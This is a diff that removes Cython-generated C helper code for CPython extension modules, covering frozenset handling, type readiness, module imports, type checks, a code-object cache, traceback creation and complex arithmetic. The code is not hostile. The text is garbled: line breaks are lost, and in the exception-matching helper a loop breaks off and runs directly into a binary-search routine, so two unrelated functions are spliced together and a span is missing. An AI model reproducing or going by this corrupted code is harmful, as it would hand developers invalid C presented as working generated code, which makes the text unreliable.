- PyObject* result; -#if CYTHON_COMPILING_IN_PYPY - PyObject* args; - args = PyTuple_Pack(1, it); - if (unlikely(!args)) - return NULL; - result = PyObject_Call((PyObject*)&PyFrozenSet_Type, args, NULL); - Py_DECREF(args); - return result; -#else - if (PyFrozenSet_CheckExact(it)) { - Py_INCREF(it); - return it; - } - result = PyFrozenSet_New(it); - if (unlikely(!result)) - return NULL; - if ((PY_VERSION_HEX >= 0x031000A1) || likely(PySet_GET_SIZE(result))) - return result; - Py_DECREF(result); -#endif - } -#if CYTHON_USE_TYPE_SLOTS - return PyFrozenSet_Type.tp_new(&PyFrozenSet_Type, __pyx_empty_tuple, NULL); -#else - return PyObject_Call((PyObject*)&PyFrozenSet_Type, __pyx_empty_tuple, NULL); -#endif -} - -/* PySetContains */ -static int __Pyx_PySet_ContainsUnhashable(PyObject *set, PyObject *key) { - int result = -1; - if (PySet_Check(key) && PyErr_ExceptionMatches(PyExc_TypeError)) { - PyObject *tmpkey; - PyErr_Clear(); - tmpkey = __Pyx_PyFrozenSet_New(key); - if (tmpkey != NULL) { - result = PySet_Contains(set, tmpkey); - Py_DECREF(tmpkey); - } - } - return result; -} -static CYTHON_INLINE int __Pyx_PySet_ContainsTF(PyObject* key, PyObject* set, int eq) { - int result = PySet_Contains(set, key); - if (unlikely(result < 0)) { - result = __Pyx_PySet_ContainsUnhashable(set, key); - } - return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); -} - -/* PyObjectCallMethod0 */ -static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { - PyObject *method = NULL, *result = NULL; - int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); - if (likely(is_method)) { - result = __Pyx_PyObject_CallOneArg(method, obj); - Py_DECREF(method); - return result; - } - if (unlikely(!method)) goto bad; - result = __Pyx_PyObject_CallNoArg(method); - Py_DECREF(method); -bad: - return result; -} - -/* ValidateBasesTuple */ -#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS -static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { - Py_ssize_t i, n; -#if CYTHON_ASSUME_SAFE_MACROS - n = PyTuple_GET_SIZE(bases); -#else - n = PyTuple_Size(bases); - if (n < 0) return -1; -#endif - for (i = 1; i < n; i++) - { -#if CYTHON_AVOID_BORROWED_REFS - PyObject *b0 = PySequence_GetItem(bases, i); - if (!b0) return -1; -#elif CYTHON_ASSUME_SAFE_MACROS - PyObject *b0 = PyTuple_GET_ITEM(bases, i); -#else - PyObject *b0 = PyTuple_GetItem(bases, i); - if (!b0) return -1; -#endif - PyTypeObject *b; -#if PY_MAJOR_VERSION < 3 - if (PyClass_Check(b0)) - { - PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", - PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); -#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - return -1; - } -#endif - b = (PyTypeObject*) b0; - if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) - { - __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); - PyErr_Format(PyExc_TypeError, - "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); - __Pyx_DECREF_TypeName(b_name); -#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - return -1; - } -#if !CYTHON_USE_TYPE_SLOTS - if (dictoffset == 0) { - PyErr_Format(PyExc_TypeError, - "extension type '%s.200s': " - "unable to validate whether bases have a __dict__ " - "when CYTHON_USE_TYPE_SLOTS is off " - "(likely because you are building in the limited API). " - "Therefore, all extension types with multiple bases " - "must add 'cdef dict __dict__' in this compilation mode", - type_name); -#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - return -1; - } -#else - if (dictoffset == 0 && b->tp_dictoffset) - { - __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); - PyErr_Format(PyExc_TypeError, - "extension type '%.200s' has no __dict__ slot, " - "but base type '" __Pyx_FMT_TYPENAME "' has: " - "either add 'cdef dict __dict__' to the extension type " - "or add '__slots__ = [...]' to the base type", - type_name, b_name); - __Pyx_DECREF_TypeName(b_name); -#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - return -1; - } -#endif -#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - } - return 0; -} -#endif - -/* PyType_Ready */ -static int __Pyx_PyType_Ready(PyTypeObject *t) { -#if CYTHON_USE_TYPE_SPECS || !(CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API) || defined(PYSTON_MAJOR_VERSION) - (void)__Pyx_PyObject_CallMethod0; -#if CYTHON_USE_TYPE_SPECS - (void)__Pyx_validate_bases_tuple; -#endif - return PyType_Ready(t); -#else - int r; - PyObject *bases = __Pyx_PyType_GetSlot(t, tp_bases, PyObject*); - if (bases && unlikely(__Pyx_validate_bases_tuple(t->tp_name, t->tp_dictoffset, bases) == -1)) - return -1; -#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) - { - int gc_was_enabled; - #if PY_VERSION_HEX >= 0x030A00b1 - gc_was_enabled = PyGC_Disable(); - (void)__Pyx_PyObject_CallMethod0; - #else - PyObject *ret, *py_status; - PyObject *gc = NULL; - #if PY_VERSION_HEX >= 0x030700a1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM+0 >= 0x07030400) - gc = PyImport_GetModule(__pyx_kp_u_gc); - #endif - if (unlikely(!gc)) gc = PyImport_Import(__pyx_kp_u_gc); - if (unlikely(!gc)) return -1; - py_status = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_isenabled); - if (unlikely(!py_status)) { - Py_DECREF(gc); - return -1; - } - gc_was_enabled = __Pyx_PyObject_IsTrue(py_status); - Py_DECREF(py_status); - if (gc_was_enabled > 0) { - ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_disable); - if (unlikely(!ret)) { - Py_DECREF(gc); - return -1; - } - Py_DECREF(ret); - } else if (unlikely(gc_was_enabled == -1)) { - Py_DECREF(gc); - return -1; - } - #endif - t->tp_flags |= Py_TPFLAGS_HEAPTYPE; -#if PY_VERSION_HEX >= 0x030A0000 - t->tp_flags |= Py_TPFLAGS_IMMUTABLETYPE; -#endif -#else - (void)__Pyx_PyObject_CallMethod0; -#endif - r = PyType_Ready(t); -#if PY_VERSION_HEX >= 0x03050000 && !defined(PYSTON_MAJOR_VERSION) - t->tp_flags &= ~Py_TPFLAGS_HEAPTYPE; - #if PY_VERSION_HEX >= 0x030A00b1 - if (gc_was_enabled) - PyGC_Enable(); - #else - if (gc_was_enabled) { - PyObject *tp, *v, *tb; - PyErr_Fetch(&tp, &v, &tb); - ret = __Pyx_PyObject_CallMethod0(gc, __pyx_kp_u_enable); - if (likely(ret || r == -1)) { - Py_XDECREF(ret); - PyErr_Restore(tp, v, tb); - } else { - Py_XDECREF(tp); - Py_XDECREF(v); - Py_XDECREF(tb); - r = -1; - } - } - Py_DECREF(gc); - #endif - } -#endif - return r; -#endif -} - -/* Import */ -static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { - PyObject *module = 0; - PyObject *empty_dict = 0; - PyObject *empty_list = 0; - #if PY_MAJOR_VERSION < 3 - PyObject *py_import; - py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); - if (unlikely(!py_import)) - goto bad; - if (!from_list) { - empty_list = PyList_New(0); - if (unlikely(!empty_list)) - goto bad; - from_list = empty_list; - } - #endif - empty_dict = PyDict_New(); - if (unlikely(!empty_dict)) - goto bad; - { - #if PY_MAJOR_VERSION >= 3 - if (level == -1) { - if (strchr(__Pyx_MODULE_NAME, '.') != NULL) { - module = PyImport_ImportModuleLevelObject( - name, __pyx_d, empty_dict, from_list, 1); - if (unlikely(!module)) { - if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) - goto bad; - PyErr_Clear(); - } - } - level = 0; - } - #endif - if (!module) { - #if PY_MAJOR_VERSION < 3 - PyObject *py_level = PyInt_FromLong(level); - if (unlikely(!py_level)) - goto bad; - module = PyObject_CallFunctionObjArgs(py_import, - name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); - Py_DECREF(py_level); - #else - module = PyImport_ImportModuleLevelObject( - name, __pyx_d, empty_dict, from_list, level); - #endif - } - } -bad: - Py_XDECREF(empty_dict); - Py_XDECREF(empty_list); - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(py_import); - #endif - return module; -} - -/* ImportFrom */ -static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name) { - PyObject* value = __Pyx_PyObject_GetAttrStr(module, name); - if (unlikely(!value) && PyErr_ExceptionMatches(PyExc_AttributeError)) { - const char* module_name_str = 0; - PyObject* module_name = 0; - PyObject* module_dot = 0; - PyObject* full_name = 0; - PyErr_Clear(); - module_name_str = PyModule_GetName(module); - if (unlikely(!module_name_str)) { goto modbad; } - module_name = PyUnicode_FromString(module_name_str); - if (unlikely(!module_name)) { goto modbad; } - module_dot = PyUnicode_Concat(module_name, __pyx_kp_u__10); - if (unlikely(!module_dot)) { goto modbad; } - full_name = PyUnicode_Concat(module_dot, name); - if (unlikely(!full_name)) { goto modbad; } - #if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) - { - PyObject *modules = PyImport_GetModuleDict(); - if (unlikely(!modules)) - goto modbad; - value = PyObject_GetItem(modules, full_name); - } - #else - value = PyImport_GetModule(full_name); - #endif - modbad: - Py_XDECREF(full_name); - Py_XDECREF(module_dot); - Py_XDECREF(module_name); - } - if (unlikely(!value)) { - PyErr_Format(PyExc_ImportError, - #if PY_MAJOR_VERSION < 3 - "cannot import name %.230s", PyString_AS_STRING(name)); - #else - "cannot import name %S", name); - #endif - } - return value; -} - -/* ImportDottedModule */ -#if PY_MAJOR_VERSION >= 3 -static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { - PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; - if (unlikely(PyErr_Occurred())) { - PyErr_Clear(); - } - if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { - partial_name = name; - } else { - slice = PySequence_GetSlice(parts_tuple, 0, count); - if (unlikely(!slice)) - goto bad; - sep = PyUnicode_FromStringAndSize(".", 1); - if (unlikely(!sep)) - goto bad; - partial_name = PyUnicode_Join(sep, slice); - } - PyErr_Format( -#if PY_MAJOR_VERSION < 3 - PyExc_ImportError, - "No module named '%s'", PyString_AS_STRING(partial_name)); -#else -#if PY_VERSION_HEX >= 0x030600B1 - PyExc_ModuleNotFoundError, -#else - PyExc_ImportError, -#endif - "No module named '%U'", partial_name); -#endif -bad: - Py_XDECREF(sep); - Py_XDECREF(slice); - Py_XDECREF(partial_name); - return NULL; -} -#endif -#if PY_MAJOR_VERSION >= 3 -static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { - PyObject *imported_module; -#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) - PyObject *modules = PyImport_GetModuleDict(); - if (unlikely(!modules)) - return NULL; - imported_module = __Pyx_PyDict_GetItemStr(modules, name); - Py_XINCREF(imported_module); -#else - imported_module = PyImport_GetModule(name); -#endif - return imported_module; -} -#endif -#if PY_MAJOR_VERSION >= 3 -static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { - Py_ssize_t i, nparts; - nparts = PyTuple_GET_SIZE(parts_tuple); - for (i=1; i < nparts && module; i++) { - PyObject *part, *submodule; -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - part = PyTuple_GET_ITEM(parts_tuple, i); -#else - part = PySequence_ITEM(parts_tuple, i); -#endif - submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); -#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) - Py_DECREF(part); -#endif - Py_DECREF(module); - module = submodule; - } - if (unlikely(!module)) { - return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); - } - return module; -} -#endif -static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { -#if PY_MAJOR_VERSION < 3 - PyObject *module, *from_list, *star = __pyx_n_s__11; - CYTHON_UNUSED_VAR(parts_tuple); - from_list = PyList_New(1); - if (unlikely(!from_list)) - return NULL; - Py_INCREF(star); - PyList_SET_ITEM(from_list, 0, star); - module = __Pyx_Import(name, from_list, 0); - Py_DECREF(from_list); - return module; -#else - PyObject *imported_module; - PyObject *module = __Pyx_Import(name, NULL, 0); - if (!parts_tuple || unlikely(!module)) - return module; - imported_module = __Pyx__ImportDottedModule_Lookup(name); - if (likely(imported_module)) { - Py_DECREF(module); - return imported_module; - } - PyErr_Clear(); - return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); -#endif -} -static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 - PyObject *module = __Pyx__ImportDottedModule_Lookup(name); - if (likely(module)) { - PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); - if (likely(spec)) { - PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); - if (likely(!unsafe || !__Pyx_PyObject_IsTrue(unsafe))) { - Py_DECREF(spec); - spec = NULL; - } - Py_XDECREF(unsafe); - } - if (likely(!spec)) { - PyErr_Clear(); - return module; - } - Py_DECREF(spec); - Py_DECREF(module); - } else if (PyErr_Occurred()) { - PyErr_Clear(); - } -#endif - return __Pyx__ImportDottedModule(name, parts_tuple); -} - -/* FastTypeChecks */ -#if CYTHON_COMPILING_IN_CPYTHON -static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { - while (a) { - a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); - if (a == b) - return 1; - } - return b == &PyBaseObject_Type; -} -static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { - PyObject *mro; - if (a == b) return 1; - mro = a->tp_mro; - if (likely(mro)) { - Py_ssize_t i, n; - n = PyTuple_GET_SIZE(mro); - for (i = 0; i < n; i++) { - if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) - return 1; - } - return 0; - } - return __Pyx_InBases(a, b); -} -static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { - PyObject *mro; - if (cls == a || cls == b) return 1; - mro = cls->tp_mro; - if (likely(mro)) { - Py_ssize_t i, n; - n = PyTuple_GET_SIZE(mro); - for (i = 0; i < n; i++) { - PyObject *base = PyTuple_GET_ITEM(mro, i); - if (base == (PyObject *)a || base == (PyObject *)b) - return 1; - } - return 0; - } - return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); -} -#if PY_MAJOR_VERSION == 2 -static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { - PyObject *exception, *value, *tb; - int res; - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - __Pyx_ErrFetch(&exception, &value, &tb); - res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; - if (unlikely(res == -1)) { - PyErr_WriteUnraisable(err); - res = 0; - } - if (!res) { - res = PyObject_IsSubclass(err, exc_type2); - if (unlikely(res == -1)) { - PyErr_WriteUnraisable(err); - res = 0; - } - } - __Pyx_ErrRestore(exception, value, tb); - return res; -} -#else -static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { - if (exc_type1) { - return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); - } else { - return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); - } -} -#endif -static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { - Py_ssize_t i, n; - assert(PyExceptionClass_Check(exc_type)); - n = PyTuple_GET_SIZE(tuple); -#if PY_MAJOR_VERSION >= 3 - for (i=0; i= 0 && code_line > entries[end].code_line) { - return count; - } - while (start < end) { - mid = start + (end - start) / 2; - if (code_line < entries[mid].code_line) { - end = mid; - } else if (code_line > entries[mid].code_line) { - start = mid + 1; - } else { - return mid; - } - } - if (code_line <= entries[mid].code_line) { - return mid; - } else { - return mid + 1; - } -} -static PyCodeObject *__pyx_find_code_object(int code_line) { - PyCodeObject* code_object; - int pos; - if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { - return NULL; - } - pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); - if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { - return NULL; - } - code_object = __pyx_code_cache.entries[pos].code_object; - Py_INCREF(code_object); - return code_object; -} -static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { - int pos, i; - __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; - if (unlikely(!code_line)) { - return; - } - if (unlikely(!entries)) { - entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); - if (likely(entries)) { - __pyx_code_cache.entries = entries; - __pyx_code_cache.max_count = 64; - __pyx_code_cache.count = 1; - entries[0].code_line = code_line; - entries[0].code_object = code_object; - Py_INCREF(code_object); - } - return; - } - pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); - if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { - PyCodeObject* tmp = entries[pos].code_object; - entries[pos].code_object = code_object; - Py_DECREF(tmp); - return; - } - if (__pyx_code_cache.count == __pyx_code_cache.max_count) { - int new_max = __pyx_code_cache.max_count + 64; - entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( - __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); - if (unlikely(!entries)) { - return; - } - __pyx_code_cache.entries = entries; - __pyx_code_cache.max_count = new_max; - } - for (i=__pyx_code_cache.count; i>pos; i--) { - entries[i] = entries[i-1]; - } - entries[pos].code_line = code_line; - entries[pos].code_object = code_object; - __pyx_code_cache.count++; - Py_INCREF(code_object); -} -#endif - -/* AddTraceback */ -#include "compile.h" -#include "frameobject.h" -#include "traceback.h" -#if PY_VERSION_HEX >= 0x030b00a6 && !CYTHON_COMPILING_IN_LIMITED_API - #ifndef Py_BUILD_CORE - #define Py_BUILD_CORE 1 - #endif - #include "internal/pycore_frame.h" -#endif -#if CYTHON_COMPILING_IN_LIMITED_API -static PyObject *__Pyx_PyCode_Replace_For_AddTraceback(PyObject *code, PyObject *scratch_dict, - PyObject *firstlineno, PyObject *name) { - PyObject *replace = NULL; - if (unlikely(PyDict_SetItemString(scratch_dict, "co_firstlineno", firstlineno))) return NULL; - if (unlikely(PyDict_SetItemString(scratch_dict, "co_name", name))) return NULL; - replace = PyObject_GetAttrString(code, "replace"); - if (likely(replace)) { - PyObject *result; - result = PyObject_Call(replace, __pyx_empty_tuple, scratch_dict); - Py_DECREF(replace); - return result; - } - #if __PYX_LIMITED_VERSION_HEX < 0x030780000 - PyErr_Clear(); - { - PyObject *compiled = NULL, *result = NULL; - if (unlikely(PyDict_SetItemString(scratch_dict, "code", code))) return NULL; - if (unlikely(PyDict_SetItemString(scratch_dict, "type", (PyObject*)(&PyType_Type)))) return NULL; - compiled = Py_CompileString( - "out = type(code)(\n" - " code.co_argcount, code.co_kwonlyargcount, code.co_nlocals, code.co_stacksize,\n" - " code.co_flags, code.co_code, code.co_consts, code.co_names,\n" - " code.co_varnames, code.co_filename, co_name, co_firstlineno,\n" - " code.co_lnotab)\n", "", Py_file_input); - if (!compiled) return NULL; - result = PyEval_EvalCode(compiled, scratch_dict, scratch_dict); - Py_DECREF(compiled); - if (!result) PyErr_Print(); - Py_DECREF(result); - result = PyDict_GetItemString(scratch_dict, "out"); - if (result) Py_INCREF(result); - return result; - } - #endif -} -static void __Pyx_AddTraceback(const char *funcname, int c_line, - int py_line, const char *filename) { - PyObject *code_object = NULL, *py_py_line = NULL, *py_funcname = NULL, *dict = NULL; - PyObject *replace = NULL, *getframe = NULL, *frame = NULL; - PyObject *exc_type, *exc_value, *exc_traceback; - int success = 0; - if (c_line) { - (void) __pyx_cfilenm; - (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); - } - PyErr_Fetch(&exc_type, &exc_value, &exc_traceback); - code_object = Py_CompileString("_getframe()", filename, Py_eval_input); - if (unlikely(!code_object)) goto bad; - py_py_line = PyLong_FromLong(py_line); - if (unlikely(!py_py_line)) goto bad; - py_funcname = PyUnicode_FromString(funcname); - if (unlikely(!py_funcname)) goto bad; - dict = PyDict_New(); - if (unlikely(!dict)) goto bad; - { - PyObject *old_code_object = code_object; - code_object = __Pyx_PyCode_Replace_For_AddTraceback(code_object, dict, py_py_line, py_funcname); - Py_DECREF(old_code_object); - } - if (unlikely(!code_object)) goto bad; - getframe = PySys_GetObject("_getframe"); - if (unlikely(!getframe)) goto bad; - if (unlikely(PyDict_SetItemString(dict, "_getframe", getframe))) goto bad; - frame = PyEval_EvalCode(code_object, dict, dict); - if (unlikely(!frame) || frame == Py_None) goto bad; - success = 1; - bad: - PyErr_Restore(exc_type, exc_value, exc_traceback); - Py_XDECREF(code_object); - Py_XDECREF(py_py_line); - Py_XDECREF(py_funcname); - Py_XDECREF(dict); - Py_XDECREF(replace); - if (success) { - PyTraceBack_Here( - (struct _frame*)frame); - } - Py_XDECREF(frame); -} -#else -static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( - const char *funcname, int c_line, - int py_line, const char *filename) { - PyCodeObject *py_code = NULL; - PyObject *py_funcname = NULL; - #if PY_MAJOR_VERSION < 3 - PyObject *py_srcfile = NULL; - py_srcfile = PyString_FromString(filename); - if (!py_srcfile) goto bad; - #endif - if (c_line) { - #if PY_MAJOR_VERSION < 3 - py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); - if (!py_funcname) goto bad; - #else - py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); - if (!py_funcname) goto bad; - funcname = PyUnicode_AsUTF8(py_funcname); - if (!funcname) goto bad; - #endif - } - else { - #if PY_MAJOR_VERSION < 3 - py_funcname = PyString_FromString(funcname); - if (!py_funcname) goto bad; - #endif - } - #if PY_MAJOR_VERSION < 3 - py_code = __Pyx_PyCode_New( - 0, - 0, - 0, - 0, - 0, - 0, - __pyx_empty_bytes, /*PyObject *code,*/ - __pyx_empty_tuple, /*PyObject *consts,*/ - __pyx_empty_tuple, /*PyObject *names,*/ - __pyx_empty_tuple, /*PyObject *varnames,*/ - __pyx_empty_tuple, /*PyObject *freevars,*/ - __pyx_empty_tuple, /*PyObject *cellvars,*/ - py_srcfile, /*PyObject *filename,*/ - py_funcname, /*PyObject *name,*/ - py_line, - __pyx_empty_bytes /*PyObject *lnotab*/ - ); - Py_DECREF(py_srcfile); - #else - py_code = PyCode_NewEmpty(filename, funcname, py_line); - #endif - Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline - return py_code; -bad: - Py_XDECREF(py_funcname); - #if PY_MAJOR_VERSION < 3 - Py_XDECREF(py_srcfile); - #endif - return NULL; -} -static void __Pyx_AddTraceback(const char *funcname, int c_line, - int py_line, const char *filename) { - PyCodeObject *py_code = 0; - PyFrameObject *py_frame = 0; - PyThreadState *tstate = __Pyx_PyThreadState_Current; - PyObject *ptype, *pvalue, *ptraceback; - if (c_line) { - c_line = __Pyx_CLineForTraceback(tstate, c_line); - } - py_code = __pyx_find_code_object(c_line ? -c_line : py_line); - if (!py_code) { - __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); - py_code = __Pyx_CreateCodeObjectForTraceback( - funcname, c_line, py_line, filename); - if (!py_code) { - /* If the code object creation fails, then we should clear the - fetched exception references and propagate the new exception */ - Py_XDECREF(ptype); - Py_XDECREF(pvalue); - Py_XDECREF(ptraceback); - goto bad; - } - __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); - __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); - } - py_frame = PyFrame_New( - tstate, /*PyThreadState *tstate,*/ - py_code, /*PyCodeObject *code,*/ - __pyx_d, /*PyObject *globals,*/ - 0 /*PyObject *locals*/ - ); - if (!py_frame) goto bad; - __Pyx_PyFrame_SetLineNumber(py_frame, py_line); - PyTraceBack_Here(py_frame); -bad: - Py_XDECREF(py_code); - Py_XDECREF(py_frame); -} -#endif - -/* Declarations */ -#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) - #ifdef __cplusplus - static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { - return ::std::complex< double >(x, y); - } - #else - static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { - return x + y*(__pyx_t_double_complex)_Complex_I; - } - #endif -#else - static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double x, double y) { - __pyx_t_double_complex z; - z.real = x; - z.imag = y; - return z; - } -#endif - -/* Arithmetic */ -#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) -#else - static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - return (a.real == b.real) && (a.imag == b.imag); - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - __pyx_t_double_complex z; - z.real = a.real + b.real; - z.imag = a.imag + b.imag; - return z; - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - __pyx_t_double_complex z; - z.real = a.real - b.real; - z.imag = a.imag - b.imag; - return z; - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - __pyx_t_double_complex z; - z.real = a.real * b.real - a.imag * b.imag; - z.imag = a.real * b.imag + a.imag * b.real; - return z; - } - #if 1 - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - if (b.imag == 0) { - return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); - } else if (fabs(b.real) >= fabs(b.imag)) { - if (b.real == 0 && b.imag == 0) { - return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.imag); - } else { - double r = b.imag / b.real; - double s = (double)(1.0) / (b.real + b.imag * r); - return __pyx_t_double_complex_from_parts( - (a.real + a.imag * r) * s, (a.imag - a.real * r) * s); - } - } else { - double r = b.real / b.imag; - double s = (double)(1.0) / (b.imag + b.real * r); - return __pyx_t_double_complex_from_parts( - (a.real * r + a.imag) * s, (a.imag * r - a.real) * s); - } - } - #else - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - if (b.imag == 0) { - return __pyx_t_double_complex_from_parts(a.real / b.real, a.imag / b.real); - } else { - double denom = b.real * b.real + b.imag * b.imag; - return __pyx_t_double_complex_from_parts( - (a.real * b.real + a.imag * b.imag) / denom, - (a.imag * b.real - a.real * b.imag) / denom); - } - } - #endif - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex a) { - __pyx_t_double_complex z; - z.real = -a.real; - z.imag = -a.imag; - return z; - } - static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex a) { - return (a.real == 0) && (a.imag == 0); - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex a) { - __pyx_t_double_complex z; - z.real = a.real; - z.imag = -a.imag; - return z; - } - #if 1 - static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex z) { - #if !defined(HAVE_HYPOT) || defined(_MSC_VER) - return sqrt(z.real*z.real + z.imag*z.imag); - #else - return hypot(z.real, z.imag); - #endif - } - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex a, __pyx_t_double_complex b) { - __pyx_t_double_complex z; - double r, lnr, theta, z_r, z_theta; - if (b.imag == 0 && b.real == (int)b.real) { - if (b.real < 0) { - double denom = a.real * a.real + a.imag * a.imag; - a.real = a.real / denom; - a.imag = -a.imag / denom; - b.real = -b.real; - } - switch ((int)b.real) { - case 0: - z.real = 1; - z.imag = 0; - return z; - case 1: - return a; - case 2: - return __Pyx_c_prod_double(a, a); - case 3: - z = __Pyx_c_prod_double(a, a); - return __Pyx_c_prod_double(z, a); - case 4: - z = __Pyx_c_prod_double(a, a); - return __Pyx_c_prod_double(z, z); - } - } - if (a.imag == 0) { - if (a.real == 0) { - return a; - } else if ((b.imag == 0) && (a.real >= 0)) { - z.real = pow(a.real, b.real); - z.imag = 0; - return z; - } else if (a.real > 0) { - r = a.real; - theta = 0; - } else { - r = -a.real; - theta = atan2(0.0, -1.0); - } - } else { - r = __Pyx_c_abs_double(a); - theta = atan2(a.imag, a.real); - } - lnr = log(r); - z_r = exp(lnr * b.real - theta * b.imag); - z_theta = theta * 